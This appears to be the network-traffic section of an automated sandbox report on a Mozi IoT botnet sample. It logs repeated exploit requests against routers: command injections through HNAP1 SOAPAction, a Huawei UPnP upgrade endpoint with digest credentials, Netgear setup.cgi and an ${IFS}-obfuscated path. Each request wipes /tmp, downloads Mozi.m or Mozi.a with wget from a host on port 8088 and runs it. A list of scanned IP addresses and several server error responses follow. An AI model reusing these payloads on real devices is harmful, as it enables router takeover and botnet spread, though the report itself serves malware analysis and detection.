Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 93.41.229.147:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 154.93.41.99:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 
192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 1.9.218.126:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</Inte
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 121.151.98.14:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 45.134.0.236
Source: unknown TCP traffic detected without corresponding DNS query: 113.200.105.232
Source: unknown TCP traffic detected without corresponding DNS query: 67.129.160.73
Source: unknown TCP traffic detected without corresponding DNS query: 184.11.167.170
Source: unknown TCP traffic detected without corresponding DNS query: 109.102.232.127
Source: unknown TCP traffic detected without corresponding DNS query: 105.61.103.103
Source: unknown TCP traffic detected without corresponding DNS query: 166.31.23.109
Source: unknown TCP traffic detected without corresponding DNS query: 35.45.112.6
Source: unknown TCP traffic detected without corresponding DNS query: 22.144.232.185
Source: unknown TCP traffic detected without corresponding DNS query: 100.196.47.140
Source: unknown TCP traffic detected without corresponding DNS query: 215.43.78.87
Source: unknown TCP traffic detected without corresponding DNS query: 86.26.124.100
Source: unknown TCP traffic detected without corresponding DNS query: 220.130.213.29
Source: unknown TCP traffic detected without corresponding DNS query: 111.249.251.6
Source: unknown TCP traffic detected without corresponding DNS query: 55.245.84.60
Source: unknown TCP traffic detected without corresponding DNS query: 200.186.246.157
Source: unknown TCP traffic detected without corresponding DNS query: 102.5.129.5
Source: unknown TCP traffic detected without corresponding DNS query: 137.64.79.56
Source: unknown TCP traffic detected without corresponding DNS query: 185.119.191.5
Source: unknown TCP traffic detected without corresponding DNS query: 21.235.94.156
Source: unknown TCP traffic detected without corresponding DNS query: 65.53.76.53
Source: unknown TCP traffic detected without corresponding DNS query: 192.79.212.170
Source: unknown TCP traffic detected without corresponding DNS query: 171.179.128.100
Source: unknown TCP traffic detected without corresponding DNS query: 72.88.15.204
Source: unknown TCP traffic detected without corresponding DNS query: 45.25.57.240
Source: unknown TCP traffic detected without corresponding DNS query: 218.50.181.147
Source: unknown TCP traffic detected without corresponding DNS query: 126.28.245.2
Source: unknown TCP traffic detected without corresponding DNS query: 40.107.51.226
Source: unknown TCP traffic detected without corresponding DNS query: 216.205.149.24
Source: unknown TCP traffic detected without corresponding DNS query: 126.36.55.25
Source: unknown TCP traffic detected without corresponding DNS query: 90.228.187.181
Source: unknown TCP traffic detected without corresponding DNS query: 29.252.61.177
Source: unknown TCP traffic detected without corresponding DNS query: 188.126.206.174
Source: unknown TCP traffic detected without corresponding DNS query: 35.183.126.209
Source: unknown TCP traffic detected without corresponding DNS query: 125.19.179.159
Source: unknown TCP traffic detected without corresponding DNS query: 29.90.179.91
Source: unknown TCP traffic detected without corresponding DNS query: 52.178.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 187.0.181.7
Source: unknown TCP traffic detected without corresponding DNS query: 198.194.3.135
Source: unknown TCP traffic detected without corresponding DNS query: 180.254.127.131
Source: unknown TCP traffic detected without corresponding DNS query: 179.194.207.199
Source: unknown TCP traffic detected without corresponding DNS query: 105.25.244.131
Source: unknown TCP traffic detected without corresponding DNS query: 91.8.221.112
Source: unknown TCP traffic detected without corresponding DNS query: 118.24.78.63
Source: unknown TCP traffic detected without corresponding DNS query: 199.238.225.170
Source: unknown TCP traffic detected without corresponding DNS query: 182.6.67.113
Source: unknown TCP traffic detected without corresponding DNS query: 154.2.250.169
Source: unknown TCP traffic detected without corresponding DNS query: 93.65.82.228
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Jan 2022 12:57:32 GMTServer: Apache/2.2.3 (Debian)Content-Length: 290Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 47 70 6f 6e 46 6f 72 6d 2f 64 69 61 67 5f 46 6f 72 6d 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 33 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /GponForm/diag_Form was not found on this server.</p><hr><address>Apache/2.2.3 (Debian) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveContent-Length: 109Date: Thu, 25 Jun 1970 01:00:08 GMTExpires: 0Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error 404: Not Found</title></head><body><h1>Error 404: Not Found</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 28 Jan 2022 12:58:23 GMTContent-Type: text/htmlContent-Length: 566Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 28 Jan 2022 12:58:42 GMTServer: ApacheContent-Length: 207Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 68 65 6c 6c 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /shellon this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 28 Jan 2022 12:59:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTVary: Accept-EncodingServer: cloudflareCF-RAY: 6d4a657b6cc89137-FRAContent-Encoding: gzipData Raw: 35 61 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c5 57 5b 6f db 36 14 7e f7 af 38 d5 80 ee 25 b4 2c 27 71 5c 47 d6 50 a4 19 96 a7 05 5b 82 ad 28 0a 83 22 8f 2c 26 14 a9 92 f4 0d db fe fb 40 51 72 e5 38 cd da 87 62 7e 31 af 1f cf e5 3b 17 a5 af de fd 7a 75 f7 fe f6 1a 4a 57 c9 6c 90 be 22 